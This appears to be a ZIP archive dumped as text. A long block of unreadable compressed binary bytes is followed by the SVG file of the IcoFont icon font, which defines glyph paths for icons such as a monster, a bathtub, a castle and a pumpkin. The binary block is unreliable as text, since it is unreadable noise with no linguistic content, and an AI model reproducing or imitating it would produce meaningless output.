�L-�*�p+ָءo�%�ѕ����E���b�a|�5{�`�:2��4�㪽���u�/	�a*\��K �{p'�68�(뻸��2��u�^��_C�.I�V\&.+PY��[�aR:/�ݐH6�����}�	Ft?Jʸ.Y,�2x�CG��J�H�1XH���0C��ʶ!��Ii�,An���S�A����*S��T�����{��"��^.H4D�Cv���?��P�ge����~���Աص+�2�a(2�����*��}���q�f!�L�����R��T�n��,�j�o��=��+��w�Q�����Ž���T"	��L\m�Z�eDeTq���b���Om���420��k�Ŋ�+ELChГh�	z��v��{�2���L\�����m;��eb�2���x��d��t��, {]
���AĹk-�p�b�A<0�4�GX܌����Q*�R`�eiنE�Н�2T���7����tZn3b��ct�%%S�m��� �략�8\��I�V%��Z��i҅�����IcG��d�j�jH4����pq�oL�d���sգ�.*ɢ��1`�L{����b��'2�5�5l���u�uP�#Ӝ	4�;GBF�	�TJ���4�;��ѡ��>YSt�T��<���%������K�4}F����r$P���c�-�4w�yݮ�ȥ"* �����v�.��wv�H�VH�S�5Yǒdڗ����s�J�F�eJ^fA
h��Ӫ��s�6xţ���Z���q�6�J`cU��1w�Y�8	��$�����)���(s�=����� ��6~����3�=Z��LC+k�AN�t��F�	y	��1*<���&r�Bf�f m��A`�0=_R�>}�����߱�@��ז�J���D`�'�����P���2*����Ml�
 	�w������
(����D�W�&�w� ���v2
��w��g�kώ0a�������p3�����0�Zda��'S��Fv��/�@W�
kn8���w��xPi
�h�;dK���0}N��l�	�!T.��~�M�ѣ��<?3��Q,H�(�����cL4�*�#0IA�	�+U4�?F~D��;�u ��4�Φ`ʁ
�0$6:�⁤�U� �L�ATQ@�f�b;mq�x���<��a��f\����c#?�@4K��j��$��T���IZ`>�"�O�b�G$Q8��B�&�>R���������W�@ט���O�w���Cu6o�ݲ��q��9k�Qѡ+�,�\$�8���� i���|���u�p�*[����P��)�I�)b�V�o�i-<�^�`��i�d �M���y�������}����p�����=\�l@H�g
�hjݔ-�@��E9>���؊��HO�����:����i�A�}�nAA�iV�a�"`c>f�g�@s@$�7H�t�б�#,�I{��z�]�8�
(l��9��_>�r5�aU��|��G����.?�fBn��]w�Qc�>~�����ӌ~�qI������p�N3wr���B5=Y	+H�?�uF�)���Br�&:�޲�r}�}�{p�y8�߁��΃�p1��2i�0�~�@`���-�T,�-�7˘�[��n��G�#<��
$�$�9E���С$��m&�,W�\�۴m�4tp��1�$I�*�m�l��y|�Խ*"��$��p�%!(.�1�5����YU�@��~c>�ab���h�l�g�DS��P�ϼB'�*�S��
4؅�&��:��)�nӇ�rÅ������}��c�x�� ���+�;RN��'p�T������9��$���U����̛�e#�m�)᱋8�j}���ڷ�ڿ��X;�����윶��ZXw�C��;�F\�u����UQե��m�ax���4ϫp$��7�pIȯ(�sAQ���ta0ӓ8$�^�"\�F3��XW6��8
*
�R�AӖ���$,)�S�Z�[
ޢt��<��R�Nc��n<�Be�S����kMT��-��g�3�ڌ(_/�<M���F\��`FQClK Tvk��?g��68l3�ɲ�`t�_�1t�����ԡxt(�Ө;�=��RPK!y���$�$icofont/fonts/icofont.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg">
<defs>
<font id="icofont" horiz-adv-x="1000" >
<font-face font-family="IcoFont" font-weight="400" font-style="Regular" units-per-em="1000" ascent="850" descent="-150" />
<missing-glyph horiz-adv-x="1000" />
<glyph glyph-name="angry-monster" horiz-adv-x="1000" unicode="&#xe800;" d="M200 263c0-5 0-11 6-13 6-2 11 2 12 7 7 21 24 31 43 40-17-1-33-6-48-13-8-4-14-11-13-21z m-37 122c-3 6-10 7-16 4-6-2-8-8-8-14 0-11 6-18 15-23 28-13 57-24 88-24 7 0 15-2 21 9-44-4-81 4-100 48z m63-79c9 0 19-2 31 13-37-8-68 0-99-3-15-2-26-9-31-24-2-5-2-11 4-15 5-3 11-1 14 3 21 27 51 26 81 26z m639 351c6 30 15 60 5 91-5 18-14 33-33 38-19 5-34-6-45-20-20-22-29-49-31-78-10-114-18-228-27-342-5-52-11-104-17-155-1-17-8-22-25-16-29 12-59 25-92 20-24-3-48-4-72-4-17 0-34-1-51 0-17 1-27 14-33 28-6 11-1 21 8 29 55 50 82 112 79 186 0 9 2 14 11 16 35 11 51 49 49 83-4 52-59 80-109 58-7-4-12-8-21-1-50 37-146 38-197 2-9-7-17-8-28-8-43 0-73-27-74-68-1-44 25-75 69-78 19-1 33-9 40-27 6-12 11-25 20-34 35-37 35-77 12-120-17-33-4-54 34-57 21-1 42 4 62 13 4 1 11 7 16 1 4-5 1-11-2-16-1-4-2-9-5-12-18-19-21-41-18-66 2-22-2-43-17-61-15-20-21-41-10-66 10-23 6-33-18-44-9-4-20-7-26-18-3-6-5-11 4-13 22-4 70 27 76 49 2 9 3 19 14 21 10 1 14-9 18-17 2-4 4-9 6-14 11-30 36-40 65-44 5 0 13-2 15 5 3 8-4 11-9 15-3 2-6 4-9 6-27 15-37 39-35 69 2 20 13 32 33 35 19 2 37-3 54-8 31-9 62-17 93-8 19 5 24-6 33-18 9-13 1-21-7-28-6-7-14-10-21-16-11-9-14-20-3-32 10-12 45-16 60-7 17 10 10 24 7 39-3 18-5 33 15 47 21 13 18 26-3 37-5 3-11 4-8 10 2 5 2 12 10 14 6 1 12 3 19 5 15 4 26 14 27 30 2 18-5 32-21 37-16 6-10 15-8 25 40 162 87 323 121 487z m-360-99c25 0 53-24 52-45-1-17-19-33-38-34-24 0-48 23-47 46 0 21 13 33 33 33z m-222-47c-1-18-20-33-43-32-26 0-45 15-45 36 0 21 19 38 42 38 26 0 47-20 46-42z m121-281c-19-13-40-19-63-16-25 3-33 19-21 42 1 2 1 4 3 5 33 32 26 65 6 99-10 16-17 33-16 52 2 32 25 60 53 66 36 7 66-6 82-36 14-25 19-52 18-81-2-52-17-99-62-131z m284-147c15-12 12-22 5-38-10 16-21 11-36 7-41-12-81-6-117 19-17 12-32 25-48 38-20 16-19 31 3 42 28 13 57 31 88 18 28-13 54-12 82-8 14 2 26 1 25-18 0-7 9-9 12-15-26-7-33-29-14-45z m-266 349c-3-4-6-8-11-5-4 1-3 6-3 9 3 20-7 30-26 29-20-2-25-15-21-33 0-3 1-6 1-9 0-4-1-9-7-10-4-1-6 3-8 6-2 4-2 10-7 9-6-2-7-8-7-13-2-21-2-42 10-60 23-34 31-66-8-94-1-1-1-2-1-2-4-6-8-12-1-17 6-4 16-10 20-4 10 14 16 27 30 4 3-5 10 4 14 7 39 37 47 84 50 136-1 12-2 26-4 40-3 14-8 23-21 7z m-165 93c-3 1-6 1-9 1-11 0-17-6-18-17 0-10 6-16 14-17 11-1 15 8 17 17 1 3 1 6 1 8-1 3-3 6-5 8z m256-32c6-3 12 0 16 5 4 5 6 10 3 18-6 14-20 15-27 8-4-4-1-12-1-17-1-7 3-11 9-14z" />
<glyph glyph-name="bathtub" horiz-adv-x="1000" unicode="&#xe801;" d="M608 495c30 0 54-25 54-55s-24-55-54-55-55 25-55 55 25 55 55 55z m-243 16c0 36 30 66 66 66s65-30 65-66-29-66-65-66-66 30-66 66z m22 0c0-24 20-44 44-44s43 20 43 44-19 44-43 44-44-20-44-44z m48 167c0 46 38 84 84 84s84-38 84-84-38-84-84-84-84 38-84 84z m23 0c0-34 27-61 61-61s61 27 61 61-28 61-61 61c-33 0-61-28-61-61z m275-698c-14-1-31-2-26-23 6-18 12-39 36-42 17-2 28 10 25 28-3 17-8 39-35 37z m-670 660c0 80 65 146 146 146s146-66 146-146-66-147-146-147-146 66-146 147z m26 0c0-67 54-121 120-121s119 54 119 121-53 120-119 120-120-54-120-120z m741-344c-13-5-26-10-39-14-201-71-407-79-616-54-25 3-55 11-41-31 29-91 97-202 235-193 42 3 84 1 126 1s84 0 126 0c162 0 254 81 275 241 10 76 6 79-66 50z m102 129c-14 26-37 14-57 3-236-122-487-130-743-93-25 4-56 17-61-22-6-38 29-37 53-42 81-15 163-17 227-20 204 1 384 31 551 119 22 11 47 25 30 55z m-644-449c-25 5-29-18-34-34-4-16 9-27 24-28 25-1 34 23 38 42 5 21-18 18-28 20z" />
<glyph glyph-name="bird-wings" horiz-adv-x="1000" unicode="&#xe802;" d="M306 788c-43-61-71-128-88-200-6-22-8-44-6-67 3-22 14-41 28-58 24-28 51-53 78-79 67-68 132-137 197-207 35-37 73-73 110-109 6-5 5-8 0-13-44-46-88-93-132-139-5-5-7-5-12 0-44 42-88 85-132 127-4 4-3 6 0 9 26 24 52 48 77 72 4 3 6 3 9 0 12-11 23-22 35-32 4-3 3-5 0-9l-25-28c-4-3-4-5 0-9 12-10 24-21 35-31 4-3 6-4 9 0 14 16 28 31 43 47 4 4 3 6-1 10-19 21-39 42-59 62-40 41-79 81-121 119-45 41-92 79-139 117-20 17-41 34-60 53-7 7-14 15-20 24-7 11-10 22-7 35 20 103 70 190 141 267 6 7 14 14 21 21 7 6 13 12 19 18z m388-3c9-5 14-10 19-16 67-65 117-140 147-229 6-20 11-40 15-61 2-8 0-16-3-24-12-22-30-38-48-54-46-39-93-77-138-116-37-32-73-65-107-101-2-1-4-2-5-4-5-7-9-7-15 0-9 12-20 22-30 33-4 4-4 6 0 9 54 59 109 118 166 174 23 23 45 45 66 69 25 28 32 62 26 97-13 80-44 153-90 219-1 1-1 1-3 4z m-87-424c0 31-3 59-31 77 85 42 127 116 156 203 20-62 25-120-21-172-32-37-67-71-101-106 0-1-1-1-3-2z m-183 77c-28-18-31-47-32-78-5 5-8 9-12 13-28 29-56 57-84 87-42 44-51 96-36 153 2 9 5 17 7 25 0 0 1 1 2 2 28-85 70-160 155-202z m177 54c7 21 3 40-9 58-3 4-10 7-8 11 1 3 8 5 12 7 51 30 87 72 103 130 1 5 2 10 3 16 5-10 7-32 5-47-6-41-25-76-48-110-17-23-36-45-58-65z m-201-1c-15 12-27 26-39 41-25 29-45 60-58 96-10 26-13 53-8 80 0 1 0 3 1 4 0 1 1 2 2 4 2-13 5-24 9-35 19-52 55-89 102-116 6-3 8-5 3-11-16-17-19-37-14-59l2-4z" />
<glyph glyph-name="bow" horiz-adv-x="1000" unicode="&#xe803;" d="M886 662c-19 10-42 16-67 16-56 0-126-27-210-81-61-39-106-77-107-79l-2-1-2 1c-2 2-46 40-107 79-84 54-155 81-210 81-25 0-48-6-67-16-26-16-57-47-51-111 4-36 18-77 33-117 9-26 18-52 24-76 60 163 311 108 311 108-164-175-252-99-257-82-12-13-26-35-33-49 53-83 165-51 225-12 28 19 53 39 75 62l2-3c-4-4-6-8-9-11-17-20-33-42-48-64-12-18-23-35-33-51-13-21-25-43-39-70-9-17-18-34-27-54-6-14-12-28-17-42l-5-11-10-24 99 66 68-99 0 26 0 25 1 14c0 13 1 27 2 40l0 6 1 4c2 23 5 47 8 71 3 19 7 40 12 61 5 24 11 50 19 74l3 10 1 3c7-4 14-5 22-5h18c8 0 15 1 22 5 0-1 1-2 1-3l3-10c8-24 14-50 19-74 5-21 9-41 12-62 3-23 6-47 8-70l1-4 0-6c1-13 3-27 3-40l0-14c0-8 0-16 0-25l0-26 68 99 99-66-10 24c-1 4-3 7-4 11-6 14-12 28-18 42-9 20-18 37-26 54-14 27-27 49-39 70-11 16-21 33-34 52-15 22-31 43-47 63-3 3-6 7-9 11l1 3c22-22 48-43 76-61 60-39 171-71 224 12-7 13-20 35-33 49-5-18-92-93-256 81 0 0 251 55 310-108 6 24 15 50 25 76 14 40 29 81 32 118 6 63-25 94-51 110z m-324-246c-5 24-27 43-53 43h-18c-26 0-48-19-53-43 0 3-1 7-1 11 0 29 24 54 54 54h18c30 0 54-24 54-54 0-4-1-8-1-11z" />
<glyph glyph-name="castle" horiz-adv-x="1000" unicode="&#xe804;" d="M323 459v131c0 9-8 17-18 17h-17c-9 0-17-8-17-17v-35h-49v35c0 9-7 17-16 17v48l104 34c7 2 8 12 1 16l-119 59c-6 3-13-1-13-7v-150c-9 0-16-8-16-17v-34h-49v34c0 10-8 18-17 18h-17c-9 0-17-8-17-18v-131c0-5 1-9 5-13l41-41c4-4 6-8 6-13v-439c0-10 8-18 18-18h137l1 457c0 5 2 9 5 13l42 41c3 4 5 8 5 13z m-104-254c0-8-6-14-14-14h-16v0h-9c-8 0-14 6-14 14v64c0 15 12 26 26 26 2 0 3 0 5 0 12-2 22-13 22-26l0-64z m701 402h-17c-10 0-18-8-18-17v-35h-48v35c0 9-8 17-17 17v48l104 34c7 2 8 12 1 16l-119 59c-6 3-13-1-13-8v-149c-8-1-15-8-15-17v-34h-49v34c0 10-8 18-18 18h-16c-10 0-18-8-18-18v-131c0-5 2-9 5-13l42-41c3-4 5-8 5-13l1-457h138c9 0 17 8 17 18v439c0 5 2 9 6 13l41 41c4 3 6 8 6 13v131c-1 9-9 17-18 17z m-87-402c0-8-6-14-13-14h-25c-8 0-14 6-14 14v64c0 13 10 24 22 26 1 0 3 0 4 0 15 0 26-11 26-26l0-64z m-177 109l36 0v-379h-70c-10 0-18 8-18 18v86c0 57-47 104-104 104s-104-47-104-104v-86c0-10-8-18-18-18h-73v379l39 0 0 35c0 10 8 18 18 18h68c10 0 18-8 18-18v-34h41v194c0 5 4 9 9 8l1 1c3 0 6-2 8-5l72-45c5-4 5-12-1-15l-70-34v-104h44v34c0 10 8 18 18 18h68c10 0 18-8 18-18v-35z" />
<glyph glyph-name="circuit" horiz-adv-x="1000" unicode="&#xe805;" d="M161 474c18 13 34 26 52 38 41 27 83 46 132 50 58 6 112-5 162-35 24-14 45-30 67-47 26-19 55-31 88-31 42 0 85 0 128 0 45 0 90 0 135 0h2c-7 31-18 62-32 91-1 0-2 0-3 0-49 0-99-1-148 0-37 1-70 12-100 32-23 16-44 34-67 50-55 38-113 66-181 69-48 2-95-2-140-20-40-16-76-39-110-64-34-47-59-100-72-158 32-2 61 5 87 25z m361 220c41-19 78-45 113-72 16-12 32-25 51-34 25-11 52-13 79-13 37-1 73 0 109 0l2 0c-77 127-216 212-376 212-97 0-186-31-258-84 38 15 78 22 119 23 56 2 110-8 161-32z m-22-781c85 0 164 24 231 66h-461c66-42 146-66 230-66z m-400 454c12 0 23 1 35 4 30 7 56 23 81 41 20 16 40 32 63 45 38 22 78 29 122 23 27-4 52-16 76-30 22-14 41-31 62-45 36-26 76-40 121-39 43 2 85 1 128 1 49 0 98 0 148 0 0 0 1 0 2 0-1 16-2 31-5 46-1 1-2 1-3 1-87-1-174 0-261-1-41 0-77 12-110 35-19 13-36 28-55 40-37 24-76 39-121 40-45 2-87-7-126-30-23-13-45-30-66-46-23-18-49-32-79-37-15-2-30-1-45-1h0c-2-16-4-31-4-47 1 0 2 0 4 0 11 0 22 0 33 0z m548-35c-14 0-28 1-41 4-35 7-65 23-93 43-21 15-42 32-64 46-35 22-72 26-111 19-25-5-46-19-67-33-23-17-44-35-69-49-28-16-58-27-90-30-17-1-33 0-49 0 0 0-1 0-1 0 1-16 2-31 4-46 1-1 3-1 5-1 22 1 44 1 66-4 35-7 65-24 94-44 19-15 38-30 59-43 32-21 66-27 103-23 25 3 46 14 66 27 20 13 39 29 59 43 43 30 90 46 143 45 41-1 82-1 123-1h60c29 0 58 1 87 0h1c3 15 4 31 5 46-1 0-2 0-3 0-96 1-192 1-287 1z m-276-120c-54 0-98 43-98 97 0 53 44 97 98 97 54 0 97-44 97-97 0-54-43-97-97-97z m271 38c-7 0-13-1-20-2-30-4-56-17-81-34-21-14-40-30-61-44-71-47-143-48-215-2-19 12-36 26-54 39-41 31-86 47-138 43 0 0 0 0 0 0 4-16 8-32 14-47h0c8 0 16 1 23 0 24-3 45-13 64-27 19-13 37-27 55-40 43-30 89-50 141-47 41-2 78 8 112 28 26 14 50 32 73 51 31 24 66 36 106 36 83-1 166-1 249-1h2c5 15 10 31 13 47h-2c-94 0-188 0-281 0z m16-81c-29 0-55-8-78-27-21-16-42-32-65-47-68-42-142-53-219-31-41 11-76 34-109 59-17 13-33 26-52 36-11 5-22 9-34 9 28-60 68-112 118-154 187 0 373 0 560 0 50 42 91 94 118 154h-4c-78 0-157 0-235 1z m3-124c-26 0-46 21-46 47 0 25 21 46 47 46 26 0 47-21 47-47 0-26-21-46-48-46z m113 40c-14 0-27 13-27 27 1 14 13 26 27 26 15 0 26-12 26-27 0-14-12-26-26-26z" />
<glyph glyph-name="crown-king" horiz-adv-x="1000" unicode="&#xe806;" d="M260 594l-67 86 53 69c9 11 24 11 33 0l58-75-77-80z m549 88l-52 67c-9 11-24 11-33 0l-59-76 75-79 69 88z m129 41v-441c0-101-196-183-438-183s-437 82-437 183v441c0 18 11 30 23 30 6 0 12-3 17-9l70-90 85-109 99 103 128 133c5 4 10 6 15 6s11-2 15-6l130-135 98-101 154 199c5 6 11 9 17 9 12 0 24-12 24-30z m-761-372l-17 42c-3 9-13 9-17 0l-16-42c-1-3-1-8 0-11l16-42c4-9 14-9 17 0l17 42c1 4 1 8 0 11z m384-50l-53 99c-4 6-12 6-16 0l-53-99c-2-4-2-10 0-14l53-98c4-7 12-7 16 0l53 98c2 5 2 10 0 14z m314 50l-17 42c-3 9-13 9-16 0l-17-42c-1-3-1-8 0-11l17-42c3-9 13-9 17 0l16 42c1 4 1 8 0 11z m-276-297c-31-4-65-5-99-5-34 0-67 1-99 5-164 15-293 69-330 137-4 6-6 12-8 19v-115c0-101 195-183 437-183s438 82 438 183v115c-2-7-5-13-8-19-38-68-167-122-331-137z" />
<glyph glyph-name="crown-queen" horiz-adv-x="1000" unicode="&#xe807;" d="M910 132c13-15 11-37-4-49-74-62-230-101-406-101s-331 39-406 100c-15 13-17 35-4 50 12 15 34 17 49 4 70-58 232-84 361-84s291 26 361 84c15 13 37 11 49-4z m27 365l-36-305c-1-6-3-11-8-15-71-60-222-98-393-98s-322 38-393 98c-5 4-7 9-8 15l-36 305c-1 10 3 19 11 24s19 3 26-2c1-1 62-48 139-48 100 0 180 78 239 232 4 9 12 15 22 15s19-6 22-15c59-154 139-232 239-232 77 0 138 47 139 47 7 6 17 7 25 2 9-4 14-13 12-23z m-664-233c0 23-17 42-37 42-20 0-37-19-37-42s17-42 37-42c20 0 37 19 37 42z m313 0l-71 107-71-107 31-47 40-60 40 60 31 47z m239 0c0 23-17 42-37 42s-37-19-37-42 17-42 37-42c20 0 37 19 37 42z" />
<glyph glyph-name="dart" horiz-adv-x="1000" unicode="&#xe808;" d="M272 487c-27-43-42-93-42-147 0-155 126-281 280-281 155 0 281 126 281 281s-126 281-281 281c-54 0-104-16-147-42l38-38c32 18 70 28 109 28 126 0 229-103 229-229 0-126-103-229-229-229s-228 103-228 229c0 40 10 77 27 109l-37 38z m104-105c-4-13-6-27-6-42 0-77 63-140 140-140 77 0 140 63 140 140s-63 140-140 140c-15 0-29-2-42-6l45-46c48-1 85-40 85-88 0-49-39-89-88-89-48 0-87 38-88 86l-46 45z m-232 178c-39-65-61-140-61-220 0-236 192-428 427-428 236 0 427 192 427 428 0 236-191 427-427 427-80 0-155-22-219-61l37-38c54 30 116 47 182 47 207 0 376-168 376-375 0-207-169-376-376-376s-375 169-375 376c0 66 17 128 47 182l-38 38z m-81 136l73 18 18 74 138-138-6-49 244-244c10-10 10-26 0-36-10-11-27-11-37 0l-243 243-50-5-137 137z" />
<glyph glyph-name="disability-race" horiz-adv-x="1000" unicode="&#xe809;" d="M538 44c-96-1-173 76-173 171 0 95 77 172 171 172 94 1 172-76 172-169 1-98-74-174-170-174z m-127 170c1-68 57-124 126-125 69 0 125 56 126 126 0 70-57 127-127 126-69 0-125-57-125-127z m-200 273c48-40 106-55 251-64-51-53-114-68-187-80 39-17 73-16 109-16-8-18-16-33-23-48-2-4-5-6-9-7-28-5-55-9-84 0 23 4 44 10 62 29-17 3-32 5-46 7-22 5-41 16-56 33-16 20-33 40-66 43 22 13 39 11 57 5 49-18 95-4 141 17-14 1-28 3-42 5-31 6-62 15-87 34-43 33-91 33-140 21-10-2-18-4-28-7 42 55 106 77 172 58 38-11 76-21 115-16 12 1 24 2 33 11-51 26-60 33-75 68 39-19 79-12 118-9 66 5 130-2 189-35 5-2 11-4 13-11-73 13-145 27-222 13 15-12 32-6 49-16-75-62-158-52-244-35z m477-161c-25 31-52 53-87 64-9 4-12 8-6 17 16 28 32 58 48 86 16 26 47 35 74 25 27-11 43-38 37-66-4-17 2-19 15-19 31 0 62-2 94-2 18-1 32-7 31-27-1-18-15-23-32-22-39 1-79 1-118 3-17 1-27-3-34-20-6-12-14-24-22-39z m142 265c0-36-30-66-65-66-36 1-66 32-65 67 1 35 30 64 65 64 36 1 66-29 65-65z m19-547c-51-1-90 38-89 88 0 50 38 88 86 89 50 1 91-38 92-87 1-49-40-90-89-90z m67 89c0 38-31 68-69 68-37-1-68-32-68-70 1-37 32-67 70-67 38 0 68 31 67 69z m-222 178h58l80-80s-37-2-53-29l-39 37-22-1c0 0 0 31-24 73z" />
<glyph glyph-name="diving-goggle" horiz-adv-x="1000" unicode="&#xe80a;" d="M63 407c3 15 6 31 14 46 16 32 42 54 76 66 45 16 90 26 137 33 82 12 164 15 247 13 89-2 177-9 264-32 27-7 54-14 77-31 32-22 52-52 58-91 0-1 1-3 2-4v-120c-3-5-3-12-4-17-20-71-64-116-136-133-8-2-16-2-24-2-62 0-123 0-184 0-16 0-21 4-23 20-5 28-12 55-33 77-25 25-59 24-83-2-17-21-25-45-29-71-1-2-1-5-2-8-2-11-8-16-19-16-59 0-118-1-176 0-57 0-101 26-132 72-16 22-25 47-28 74-1 2-1 4-2 6l0 120z m632-235c24 0 48 0 72 0 75-1 130 63 133 124 2 32 1 65 1 98-1 30-14 54-37 73-14 12-31 18-49 24-83 25-170 34-257 37-85 3-171 0-256-12-47-7-93-15-138-32-37-13-63-47-64-86-1-33 0-66 0-98 0-17 3-34 11-49 21-46 56-77 108-79 54-2 108 0 162 0 5 0 6 2 7 6 5 26 15 50 31 71 40 50 106 51 147 3 17-21 27-45 33-72 1-6 3-8 10-8 29 0 57 0 86 0z m-210 321c95 0 189-5 282-27 18-4 35-9 52-15 30-11 46-33 46-65 0-29 1-59-1-89-3-46-44-87-90-89-45-1-89 0-134 0-10 0-16 5-20 15-11 28-26 54-51 73-55 44-131 34-175-24-12-15-21-32-28-51-3-8-9-13-18-13-43 0-86-1-128 0-35 1-58 22-74 52-6 12-10 26-10 40-1 33-2 65 0 98 2 25 15 43 39 52 38 14 77 22 117 28 64 10 128 14 193 15z m12-37c-54-1-110-3-166-10-47-6-93-13-138-29-15-5-21-13-21-29v-71c0-8 0-16 2-24 5-31 27-49 59-49 32 0 63 0 95 0 6 0 9 2 12 7 8 18 18 35 31 50 54 66 148 78 217 28 27-20 46-47 59-77 3-6 6-8 13-8 35 0 70 1 104 0 36-1 65 32 64 64 0 26 0 51 0 77 0 17-6 26-22 32-26 9-53 15-80 20-75 14-151 18-229 19z m-163-144c-10 0-18 6-19 16-1 10 5 19 15 20 13 2 26 4 38 5 10 1 19-6 20-16 1-10-5-19-15-21-13-1-26-2-39-4z m-54 6c0-9-5-15-14-18-11-4-23-7-35-10-9-3-18 2-22 11-3 9 1 19 10 23 13 5 27 9 41 12 10 2 20-8 20-18z" />
<glyph glyph-name="eye-open" horiz-adv-x="1000" unicode="&#xe80b;" d="M462 650c0 15-1 30 0 46 0 24 17 41 39 41 23 0 40-18 41-41 0-31 0-62-1-93 0-8 1-12 11-13 8 0 16-3 24-5 6-2 9 0 10 6 9 29 19 57 28 86 7 22 27 34 48 28 22-6 35-27 28-50-9-30-19-60-29-90-2-7-2-10 5-13 8-3 15-8 23-12 12-7 12-7 19 5 16 25 31 49 47 74 17 25 54 23 68-4 7-14 6-28-3-41-16-26-32-53-49-79-4-5-4-9 2-13 8-6 16-12 24-20 4-4 7-4 11 1 19 22 38 44 58 65 17 19 41 22 58 6 18-16 18-40 1-58-19-23-39-45-59-67-6-6-6-10 0-18 24-27 45-56 60-90 8-16 8-32 1-49-19-42-48-77-79-110-51-55-109-101-176-135-59-29-121-47-187-44-56 2-108 17-157 43-100 51-181 126-243 220-6 9-12 19-17 29-7 15-7 30 0 45 18 36 41 67 67 97 6 7 6 10 0 16-20 22-40 44-59 67-12 14-12 32-2 47 10 14 28 21 44 16 9-3 16-9 23-16 16-20 34-38 50-58 6-7 9-6 16 0 6 6 14 12 22 18 5 4 6 7 2 12-16 25-31 50-47 75-16 26-3 56 26 62 15 4 31-4 41-18 15-24 30-49 45-73 4-7 7-7 14-3 9 5 18 10 28 15 5 2 6 4 4 10-9 29-18 57-27 86-7 22 3 45 25 52 21 7 42-4 50-27 9-28 19-56 27-84 2-7 5-8 12-7 8 3 17 4 25 5 6 1 8 3 8 9-1 16 0 32 0 49z m-193-370c0-126 101-229 224-229 131-1 233 100 233 230 0 123-103 226-226 226-128 0-230-100-231-227z m100-1c2 75 59 130 134 128 68-1 124-61 122-131-1-69-60-130-137-125-65 4-119 59-119 128z" />
<glyph glyph-name="flora-flower" horiz-adv-x="1000" unicode="&#xe80c;" d="M909 232v-5c-3-2-4-6-5-9-49-94-110-179-201-239-120-80-245-89-374-20-78 42-135 105-184 176-20 30-37 61-54 92v5c2 0 5 0 7 1 44 12 87 11 130-3 80-24 141-74 194-135 18-22 34-45 50-72 0 5 0 7 0 9 0 133 0 266 1 399 0 10-5 11-13 11-43-1-83 8-121 28-49 25-81 64-84 119-1 29-1 58 0 88v111l133-124 112 124 107-124 135 124 3-61c0-3 0-5 0-7 1-41 0-81 0-121 0-45-18-82-54-110-43-34-94-46-149-47-11 0-15-3-15-14 1-130 1-260 1-390 0-4-1-8 1-12 1 1 2 1 2 1l5 9c43 69 99 126 171 167 50 28 103 44 162 36 14-1 27-5 40-7z" />
<glyph glyph-name="flora" horiz-adv-x="1000" unicode="&#xe80d;" d="M860 295c-1-100-35-187-101-260-59-65-131-106-216-119-58-9-114 0-168 23-101 44-173 120-213 228-15 39-21 80-22 121 0 80 0 160 0 239 0 82 1 163 0 245 0 12 1 16 14 14 99-13 190-46 273-104 25-18 20-14 3-34-59-72-111-149-131-244-17-81-5-157 44-224 33-45 76-71 129-79 113-17 208 65 231 184 12 69 0 134-27 197-28 64-68 121-113 173-10 12-10 12 3 22 78 57 165 91 258 106 10 2 19 2 28 4 6 1 8-1 8-7v-9c0-159 0-317 0-476z m-350 327c53-63 100-129 122-211 18-64 14-126-26-181-60-84-179-73-226 20-15 30-23 62-22 90-1 62 19 111 44 158 24 45 54 85 87 123 8 9 12 10 21 1z" />
<glyph glyph-name="gift-box" horiz-adv-x="1000" unicode="&#xe80e;" d="M467 12c0-100 0-100-101-100-93 0-102 9-102 101 0 102 0 102 100 102 103 0 103 0 103-103z m-102 367c-90 0-100-10-101-102 0-100 0-100 100-100 103 0 103 0 103 103 0 100 0 100-102 99z m106 46c-67 4-126 4-181 27-27 11-52 25-49 57 3 40 26 69 60 89 28 16 52 3 73-16 45-41 69-95 97-157z m-108 29c25-11 53-11 83-13-13 29-23 54-44 72-10 9-21 15-34 8-16-9-26-23-28-41-1-15 11-21 23-26z m265-277h5c98 0 98 0 98 97 0 95-10 106-103 105-99 0-99 0-99-101 0-101 0-101 99-101z m-129 248c-47 94-96 176-94 276 1 58 35 88 95 87 59-1 89-29 90-86 3-99-44-183-91-277z m46 168c-1 27-16 40-44 41-29 0-45-14-45-42-1-48 22-88 45-133 22 45 45 86 44 134z m162-142c-48-20-99-19-144-25-25-3-35 2-24 24 22 48 45 95 84 131 21 20 45 33 73 18 37-20 61-52 63-93 2-30-26-44-52-55z m-53 28c-1 18-12 32-28 41-12 6-23 1-32-8-18-16-28-37-38-58-4-10 0-12 11-11 20 3 43 3 64 12 11 5 23 10 23 24z m-28-364c-97 0-97 0-97-98 0-105 0-105 107-105 84 0 95 12 95 97 1 106 1 106-105 106z" />
<glyph glyph-name="halloween-pumpkin" horiz-adv-x="1000" unicode="&#xe80f;" d="M389 755c7 18 31 25 51 10 15-11 28-25 40-40 9-10 25-21 19-37-6-17-25-16-39-19-34-1-83 55-71 86z m544-492c-19-143-90-242-206-308-34-19-70-24-107-26-38-2-77 0-116 0-63-2-126-7-188 11-143 41-237 172-251 348-7 81-1 161 32 236 39 90 108 125 196 134 81 8 161-3 245 18 232 61 431-155 395-413z m-339 239l114-147 90 147h-204z m-135-256h153l-11 26c-1 2-2 5-4 8l-56 123-82-157z m-207 256l106-152 98 152h-204z m580-272c-37-17-68-49-109-53-7 0-10-6-12-13-8-40-23-33-46-11-15 15-99 3-108-11-19-32-66-34-83-2-7 14-15 17-25 15-31-4-66 21-95-15-5-6-28-10-30 15-1 10-2 21-14 22-44 5-76 36-113 58 2-90 60-170 144-202 22-9 39-13 52 18 12 27 34 27 41-5 6-27 21-29 40-29 26-1 53 0 79-1 23 0 40 4 48 34 8 30 26 24 38 1 9-14 13-28 34-25 79 12 161 113 159 204z" />
